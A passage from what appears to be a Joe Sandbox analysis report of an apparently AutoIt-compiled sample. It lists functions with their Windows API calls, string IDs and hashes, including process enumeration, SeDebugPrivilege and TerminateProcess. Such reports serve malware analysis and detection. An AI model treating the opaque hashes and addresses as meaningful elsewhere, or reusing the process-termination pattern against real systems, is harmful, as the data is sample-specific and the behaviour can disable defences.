                                          • GetProcessHeap.KERNEL32 ref: 00EA180C
                                          • HeapAlloc.KERNEL32(00000000,?,00EA1449,?,?,00000000), ref: 00EA1813
                                          • GetCurrentProcess.KERNEL32 ref: 00EA1828
                                          • GetCurrentProcess.KERNEL32 ref: 00EA1830
                                          • DuplicateHandle.KERNEL32(00000000,?,00EA1449,?,?,00000000), ref: 00EA1833
                                          • GetCurrentProcess.KERNEL32 ref: 00EA1843
                                          • GetCurrentProcess.KERNEL32 ref: 00EA184B
                                          • DuplicateHandle.KERNEL32(00000000,?,00EA1449,?,?,00000000), ref: 00EA184E
                                          • CreateThread.KERNEL32(00000000,00000000,00EA1874,00000000,00000000,00000000), ref: 00EA1868
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                          • String ID:
                                          • API String ID: 1957940570-0
                                          • Opcode ID: 2ec8ea440af999fb76cddd360519d0aa03b6c25d66d9180e63d94c5733206564
                                          • Instruction ID: 5a47dc6ecb0c89f957f1d9940f7adec5a6182c998889f851c2630b9f5472a180
                                          • Opcode Fuzzy Hash: 2ec8ea440af999fb76cddd360519d0aa03b6c25d66d9180e63d94c5733206564
                                          • Instruction Fuzzy Hash: B701C275241315BFE710AF75EC4DF573B6CEB89B51F104451FA05EB192C6749804CB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ECA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00EAD501
                                            • Part of subcall function 00EAD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00EAD50F
                                            • Part of subcall function 00EAD4DC: CloseHandle.KERNEL32(00000000), ref: 00EAD5DC
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ECA16D
                                          • GetLastError.KERNEL32 ref: 00ECA180
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ECA1B3
                                          • TerminateProcess.KERNEL32 ref: 00ECA268
                                          • GetLastError.KERNEL32 ref: 00ECA273
                                          • CloseHandle.KERNEL32(00000000), ref: 00ECA2C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 2533919879-2896544425
                                          • Opcode ID: 38234d12fe0da88c22838343ac9e8352caab7bd98066251dc2faab371a039c30
                                          • Instruction ID: 876f00ea9c28dfab003b570519960227b1103a7c5e199e1af2a7d974ad0b3f20
                                          • Opcode Fuzzy Hash: 38234d12fe0da88c22838343ac9e8352caab7bd98066251dc2faab371a039c30
                                          • Instruction Fuzzy Hash: E261CE702092529FD724DF14D594F16BBE1AF4430CF18949CE466ABBA3C776EC4ACB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00ED3925
                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00ED393A
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00ED3954
                                          • _wcslen.LIBCMT ref: 00ED3999
                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00ED39C6
                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00ED39F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window_wcslen
                                          • String ID: SysListView32
                                          • API String ID: 2147712094-78025650
                                          • Opcode ID: a5b90bddc5862a55a98c2f60c341889b455a1e93a94775dccbce30ad43ae9b4b
                                          • Instruction ID: cbda60ec0352c8dd25d9804208f83e348b2564014b7e3bd19de0612e0f19ebc8
                                          • Opcode Fuzzy Hash: a5b90bddc5862a55a98c2f60c341889b455a1e93a94775dccbce30ad43ae9b4b
                                          • Instruction Fuzzy Hash: 4D41FC31A00209ABEB219F64CC49BEA7BA9EF08354F101127F958F72C1D7B0DA81CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E62D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                          Download Yara Rule
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 00E62D4B
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00E62D53
                                          • _ValidateLocalCookies.LIBCMT ref: 00E62DE1
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00E62E0C
                                          • _ValidateLocalCookies.LIBCMT ref: 00E62E61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: &H$csm
                                          • API String ID: 1170836740-1242228090
                                          • Opcode ID: 66d71331d893b4d8ee2ba6df2acec8571e79f0ea7eb553902d293bc957e5a528
                                          • Instruction ID: 1ac4f54686859ad85031b06dc361493fa17f75f03032c07ef95acec7e4abd6b5
                                          • Opcode Fuzzy Hash: 66d71331d893b4d8ee2ba6df2acec8571e79f0ea7eb553902d293bc957e5a528
                                          • Instruction Fuzzy Hash: D941F634A406099BCF10DF68E844ADEBBF4BF443A8F149159E914BB392D731DA05CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2457776203-404129466
                                          • Opcode ID: 094124fdfe9f04892ff9cba257cda3e7bb0aa426aa9f818343b378e59b5fb3ca
                                          • Instruction ID: 4ecd18623a356dad3e42bb1eddddadae5736f8ae779830baa4d2839d826d3ead
                                          • Opcode Fuzzy Hash: 094124fdfe9f04892ff9cba257cda3e7bb0aa426aa9f818343b378e59b5fb3ca
                                          • Instruction Fuzzy Hash: 70112B35689307BEE7055B54AC82CEB67DCDF5A358B30102FF504FA2C2EBA4BD006265
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$LocalTime
                                          • String ID:
                                          • API String ID: 952045576-0
                                          • Opcode ID: 1ee220d49d26e52248a42dcb4c3b732b82efe94fddd8a11d0054d4f20bf9d5f1
                                          • Instruction ID: 9643025c03bf2f63c07f79b96ff80355545f462ffe9133af136c9f9b9d56b249
                                          • Opcode Fuzzy Hash: 1ee220d49d26e52248a42dcb4c3b732b82efe94fddd8a11d0054d4f20bf9d5f1
                                          • Instruction Fuzzy Hash: F041BE65C5021876DB11EBB49C8A9CFB3ECAF46340F50A462E518F3262FB34E245C3A6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E5F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(FFFFFFFF,000000FF), ref: 00E5F953
                                          • ShowWindow.USER32(FFFFFFFF,00000006), ref: 00E9F3D1
                                          • ShowWindow.USER32(FFFFFFFF,000000FF), ref: 00E9F454
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: 9c889b5849421cc5a78b8accd82a1dda02d3225aa3e1c93419c8650b14f49bb6
                                          • Instruction ID: 17a4e69865342fde6c06e6f83e885f2161124e0fc2c15a93f66fa64921cd8021
                                          • Opcode Fuzzy Hash: 9c889b5849421cc5a78b8accd82a1dda02d3225aa3e1c93419c8650b14f49bb6
                                          • Instruction Fuzzy Hash: E6414031504A80BECB348B79D9887AA7BD1BBD635AF14783DE857B2560C671D488C711
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 00ED2D1B
                                          • GetDC.USER32(00000000), ref: 00ED2D23
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ED2D2E
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00ED2D3A
                                          • CreateFontW.GDI32 ref: 00ED2D76
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00ED2D87
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00ED2DC2
                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00ED2DE1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                          • String ID:
                                          • API String ID: 3864802216-0
                                          • Opcode ID: 9ac7d97e943a787bd0c943834d328580d70de4825014d392990d932fa325d548
                                          • Instruction ID: 6bcfc957c7d86159057803afc26c3bd19136da4c2ebb8367243c2336d6e2f487
                                          • Opcode Fuzzy Hash: 9ac7d97e943a787bd0c943834d328580d70de4825014d392990d932fa325d548
                                          • Instruction Fuzzy Hash: BC31AE72202214BFEB118F51DC8AFEB3FADEF19755F144056FE08AA291C6759C41CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: 87a98ab4f77f0d3fec6f0d8f83887b5ec44708487b3e162d553a5faf3d89ff34
                                          • Instruction ID: fda035ffbc755e9b7ae9aabebd4edf0ed6b81a3062c308f632feb057ea846190
                                          • Opcode Fuzzy Hash: 87a98ab4f77f0d3fec6f0d8f83887b5ec44708487b3e162d553a5faf3d89ff34
                                          • Instruction Fuzzy Hash: D121DA636C0B05B7D21595105E82FFA739CEF6A388F456022FD067E741F720FD1181A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: NULL Pointer assignment$Not an Object type
                                          • API String ID: 0-572801152
                                          • Opcode ID: 8774c203ff527fd636b2c6a3e20a1941dbf707168a18225c0f3f0ce5e6793a95
                                          • Instruction ID: 1e86bbe561bc673312c02fc4999c90f1698d9087d93bf410a067c62f713dbf0d
                                          • Opcode Fuzzy Hash: 8774c203ff527fd636b2c6a3e20a1941dbf707168a18225c0f3f0ce5e6793a95
                                          • Instruction Fuzzy Hash: FFD1AE72A0060A9FDF14CF98C981FAEB7B5BF48344F14906DE915BB281D772E986CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E81522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCPInfo.KERNEL32(00000000,00000000), ref: 00E815CE
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000), ref: 00E81651
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00E817FB), ref: 00E816E4
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000), ref: 00E816FB
                                            • Part of subcall function 00E73820: RtlAllocateHeap.NTDLL(00000000,?,00F11444,?,00E5FDF5,?,?,00E4A976,00000010,00F11440,00E413FC,?,00E413C6,?,00E41129), ref: 00E73852
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000), ref: 00E81777
                                          • __freea.LIBCMT ref: 00E817A2
                                          • __freea.LIBCMT ref: 00E817AE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                          • String ID:
                                          • API String ID: 2829977744-0
                                          • Opcode ID: 6f086f8591e48f68ac799a6befb344f564a33e25fc80df3a074a84fa0b24a662
                                          • Instruction ID: 11a2eb21246f0f0dc470b831a69aeae5bbb9861f86c31c94da705990384db0db
                                          • Opcode Fuzzy Hash: 6f086f8591e48f68ac799a6befb344f564a33e25fc80df3a074a84fa0b24a662
                                          • Instruction Fuzzy Hash: 4991B371E002169ADB20AF74D841AEE7BF9EF49354F18669AE80DF7181D735CC42CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit
                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                          • API String ID: 2610073882-625585964
                                          • Opcode ID: b016fdf763cd5482a2561356bf4b246a93168c42827e7c4e43e0cd875948bde1
                                          • Instruction ID: 6f7d13fc56f42cabc31211c69096c2a5cf8e90b28dcb1bc5e00a930786e8469e
                                          • Opcode Fuzzy Hash: b016fdf763cd5482a2561356bf4b246a93168c42827e7c4e43e0cd875948bde1
                                          • Instruction Fuzzy Hash: 1091ADB0A00219ABDF20CFA4C954FAEBBB8EF46714F10955EF505BB2C0D7719946CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                          Download Yara Rule
                                          APIs
                                          • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00EB125C
                                          • SafeArrayAccessData.OLEAUT32 ref: 00EB1284
                                          • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00EB12A8
                                          • SafeArrayAccessData.OLEAUT32 ref: 00EB12D8
                                          • SafeArrayAccessData.OLEAUT32 ref: 00EB135F
                                          • SafeArrayAccessData.OLEAUT32 ref: 00EB13C4
                                          • SafeArrayAccessData.OLEAUT32 ref: 00EB1430
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                                          • String ID:
                                          • API String ID: 2550207440-0
                                          • Opcode ID: b8ac6cc66389ba997798a86999b0885c221b0b2a43c6ed857eb3911350a25d8f
                                          • Instruction ID: f32a3651642e62ab668c47e07d71f204be6c88a9943d20c0f46bfeac11c5ac5b
                                          • Opcode Fuzzy Hash: b8ac6cc66389ba997798a86999b0885c221b0b2a43c6ed857eb3911350a25d8f
                                          • Instruction Fuzzy Hash: F191DD71A00219AFDB009FA8D8A4BEFB7F5FF45325F1050A9E910FB2A1D774A941CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E5948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          • Opcode ID: a3dc267ffcffdee285cf28971c9187ac05f76f1311874feb813d93315e5de164
                                          • Instruction ID: 0e453b04db58b4d5fd563277b4b9d1e65502f9a7c9c2efbed517fef6e045b4ca
                                          • Opcode Fuzzy Hash: a3dc267ffcffdee285cf28971c9187ac05f76f1311874feb813d93315e5de164
                                          • Instruction Fuzzy Hash: 1A914871D00219EFCB10CFA9CC84AEEBBB8FF48320F149555E915B7252D378A955CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00EC396B
                                          • CharUpperBuffW.USER32(?,?), ref: 00EC3A7A
                                          • _wcslen.LIBCMT ref: 00EC3A8A
                                          • VariantClear.OLEAUT32 ref: 00EC3C1F
                                            • Part of subcall function 00EB0CDF: VariantInit.OLEAUT32(00000000), ref: 00EB0D1F
                                            • Part of subcall function 00EB0CDF: VariantCopy.OLEAUT32 ref: 00EB0D28
                                            • Part of subcall function 00EB0CDF: VariantClear.OLEAUT32 ref: 00EB0D34
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                          • API String ID: 4137639002-1221869570
                                          • Opcode ID: 46173c3f5c924353c4c125bc43a581e26bc242be226a33525d385cc9a129431c
                                          • Instruction ID: cc4406ed9777d18d69dcd13f6d30c68630b009058372202029bcfe71564db454
                                          • Opcode Fuzzy Hash: 46173c3f5c924353c4c125bc43a581e26bc242be226a33525d385cc9a129431c
                                          • Instruction Fuzzy Hash: 21915A75A083019FC704EF24C580A6AB7E5FF89314F14996DF889AB351DB31EE46CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EA000E: CLSIDFromProgID.OLE32 ref: 00EA002B
                                            • Part of subcall function 00EA000E: ProgIDFromCLSID.OLE32(?,00000000), ref: 00EA0046
                                            • Part of subcall function 00EA000E: lstrcmpiW.KERNEL32 ref: 00EA0054
                                            • Part of subcall function 00EA000E: CoTaskMemFree.OLE32 ref: 00EA0064
                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00EC4C51
                                          • _wcslen.LIBCMT ref: 00EC4D59
                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00EC4DCF
                                          • CoTaskMemFree.OLE32 ref: 00EC4DDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
